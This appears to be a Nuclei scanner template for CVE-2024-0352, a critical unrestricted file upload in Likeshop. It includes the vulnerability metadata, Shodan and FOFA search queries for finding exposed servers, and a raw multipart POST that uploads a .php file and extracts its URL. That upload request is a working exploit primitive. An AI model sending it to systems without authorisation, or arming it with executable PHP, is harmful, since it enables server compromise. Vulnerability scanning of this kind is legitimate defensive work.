2024-01-10 10:06:24 +00:00
id: CVE-2024-0352

info:
  name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload
  author: CookieHanHoan,babybash,samuelsamuelsamuel
  severity: critical
  description: |
    A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to an unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434.
  impact: |
    The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
  remediation: Update to the latest version
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0352
    - https://note.zhaoj.in/share/ciwYj7QXC4sZ
    - https://vuldb.com/?ctiid.250120
    - https://vuldb.com/?id.250120
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0352
    cwe-id: CWE-434
    epss-score: 0.0086
    epss-percentile: 0.82263
    cpe: cpe:2.3:a:likeshop:likeshop:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: likeshop
    product: likeshop
    shodan-query: http.favicon.hash:874152924
    fofa-query: icon_hash=874152924
  tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive

variables:
  filename: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /api/file/formimage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36

        ------WebKitFormBoundarygcflwtei
        Content-Disposition: form-data; name="file";filename="{{filename}}.php"
        Content-Type: application/x-php

        {{randstr}}
        ------WebKitFormBoundarygcflwtei--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"name\":\"{{filename}}.php\"")'
          - 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'
        condition: and

    extractors:
      - type: json
        part: body
        json:
          - ".data.url"
# digest: 4a0a00473045022100f918936fafffcf93421ce086207f2283925cd669ecc632d7ed2bc75094b855a802200fd6828f58d3fe1ed11a252d611b4b5a317e232fcc89bb3d80c103e17ea3ac4e:922c64590222798bb761d5b6d8e72950